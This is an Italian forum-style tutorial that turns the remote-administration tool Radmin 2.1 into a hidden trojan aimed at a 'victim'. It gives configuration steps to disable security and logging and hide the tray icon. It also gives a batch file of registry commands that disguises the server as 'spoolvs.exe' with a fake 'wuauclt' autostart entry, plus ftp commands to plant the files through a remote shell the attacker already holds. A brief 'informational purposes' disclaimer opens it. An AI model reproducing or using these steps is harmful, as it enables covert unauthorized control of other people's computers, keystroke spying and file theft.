###############
Guida by preserva
###############
Si è pregati di inserire l'autore e di non compiere cattive azioni con questa guida..è a scopo informativo come tutte le altre
Ho voluto fare questa guida dato ke per Radmin non ce ne sono..
ho utilizzato la versione 2.1 perkè con le versioni vekkie si hanno più possibilità di compiere bypass nei sistemi di sicurezza di un pc. Radmin è uno dei tanti software per il controllo remoto,ed è reperibile in rete nel sito uffficiale
www.radmin.com.
Ovviamente la versione è aggiornata,ma voi provate lo stesso per vedere se funziona..tanto nn ve costa niente
Cosa ci permetterà di fare radmin?
-----------------------------------------------------
-creare una shell remota apposita per radmin
-una scrittura remota della nostra vittima dalla propria macchina
-spiare ciò che scrive
-scaricare e caricare archivi contenenti dei file
-avere una visione in tempo reale del suo desktop
------------------------------------------------------
A questo punto siamo pronti per incominciare:
-Installiamo Radmin nel nostro pc
-apriamo una shell, basterà andare su start-->esegui-->cmd o command.com a seconda del nostro caso e ci indirizziamo nel percorso dove abbiamo installato radmin, cioè C:\Programmi\Radmin
-a questo punto scriviamo:
CODICE
C:\Programmi\Radmin
eseguendo
CODICE
C:\Programmi\Radmin\r_server.exe /setup
comparira una finestra nella quale potremo configuarlo a nostro piacimento
-scegliamo l'opzione Set password
adesso procediamo nell'inserire la nostra password,contenente minimo 8 caratteri,prima di dare ok,bisogna disattivare l'opzione Enable NT security e diamo OK
-adesso ci dirigiamo all'opzione Options
in port mettete qll ke volete, sarebbe la porta ke radmin usera per collegarsi al server, vi consiglio di usare porte superiori a 1000 per avere una possibilità minore di sospetti, mentre nelle restanti opzioni, assicuratevi ke tutto sia disattivato, evitiamo di lasciare logs di qualsiasi tipo, adesso diamo ok e exit
-a questo punto,ke abbiamo il nostro radmin modificato, vi spiegherò i 2 metodi, uno per installarlo da shell remota del utente e un altra per fare un solo eseguibile ke abbia gia il nostrp radmin e la sua configurazione
-dirigiamoci nel registro di sistema nel seguente percorso
CODICE
HKEY_LOCAL_MACHINE\System\Radmin\v2.1\Server\Parameters
e ci focalizziamo nelle seguenti entrate:
Port qui c'è la porta ke abbiamo messo solo ke in hexadecimal
Parameter sta nel contrassegno
DisableTrayIcon è l'opzione per nascondere l'icona. Quello ke andiamo a fare, è copiare i valori di qll 3 entrate, nel mio caso i valori furono questi:
Port : 2500
Parameter 0f5bb8ee24548ba202dc083cc6dec3c1
DisableTrayIcon 01000000 (ke dovrebbe essere uguale per tutti)
-Adesso ci dirigiamo nella cartella dove abbiamo radmin e gli cambiamo il nome in r_server.exe in un altro meno sospettabile, io lo rinominai sotto il nome di spoolvs.exe e cn il programma apposta, gli cambiai l'icona
-adesso andiamo a fare un bat ke ci aggiunga le kiavi nel registro e ke faccia partire radmin con l'avvio di microsoft:
CODICE
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.1Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.1\Server\Parameters /v Parameter /t REG_BINARY /d "0f5bb8ee24548ba202dc083cc6dec3c1"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\spoolvs.exe"
ovviamente dovete modificare il bat con i vostri valori..
-adesso bisogna caricare l'arkivio tramite ftp
-una volta ke abbiamo una shell remota della vittima, gli andremmo a uppare radmin seguendo l'esempio
CODICE
ftp -i suoip get spoolvs.exe C:\windows\system32\spoolvs.exe
(radmin da noi rinominato)
CODICE
ftp -i suoip get AdmDll.dll C:\windows\system32\AdmDll.dll
(qui nn tokkiamo neitne perkè stiamo caricando la dll del radmin)
CODICE
ftp -i suoip get nome.bat C:\window\ssystem32\nome.bat
(questo è il bat ke si occupa di caricare i valori nel registro di sistema)
-adesso basta solo eseguire il bat dalla shell ke già avevamo congfigurata precedentemente
- eseguire radmin e dalla shell scrivere:
spoolvs.exe /pass:miapassword /port:2500(quella ke avevo configurato io)
io gli misi al mio radmin spoolvs.exe pero ogniuno è libero di rinominarlo come gli pare, in questo modo riusciamo tranquillamente a entrare col cliente(radmin.exe) e avere il controllo del pc senza necessita di aspettare ke riavviia il sistema per apportare le modifike.
-il trojan per radmin è pronto da mandare alla vittima
